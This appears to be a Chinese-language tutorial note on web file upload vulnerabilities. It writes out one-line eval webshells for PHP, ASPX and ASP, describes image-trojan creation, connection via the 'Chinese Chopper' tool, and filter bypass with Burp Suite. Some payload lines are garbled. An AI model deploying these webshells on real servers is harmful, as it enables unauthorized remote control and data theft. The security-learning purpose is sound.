文件上传漏洞详解

网站图片、文件上传功能漏洞笔记

文件上传漏洞之程序员未对上传的文件进行严格的上传和过滤,导致用户可以利用上传功能向服务器上传木马、病毒、恶意脚本、webshell等。“文件上传”本身没有问题,有问题是文件上传后服务器的处理和解析逻辑。

制作脚本文件上传至web服务器

  制作脚本文件(制作相关语言文件)

  php:   eval($_POST['pass']);?> 

  aspx:   <%@ Page Language="Jscript"%> <%eval(Request.Item["pass"],"unsafe");%> 

  asp:    <%eval request ("pass")%> 

  制作图片木马

  利用Edjpgcom软件直接将语句插入,或者利用cmd命令将脚本文件和图片相结合

  Edjpgcomr图片插入语句 "shell.php","w"),)?> 

  利用文件包含解析漏洞让服务器对图片进行解析,在服务器端生成脚本文件。

 

利用“中国菜刀”软件进行连接脚本文件

  软件中的配置框中可以进行数据库配置连接  

  文件上传漏洞详解_第1张图片

 

 

脚本绕过防火墙

  具体是后端上传文件过滤语句不完善导致,文件后缀过滤、大小过滤、文件类型过滤、文件内容过滤等。

  例如:利用BURPSUITE软件挂代理进行文件信息修改。改变脚本文件内容进行(//绕过@eval_r($_POST[sb])//绕过限制的一句话)

 

你可能感兴趣的:(文件上传漏洞详解)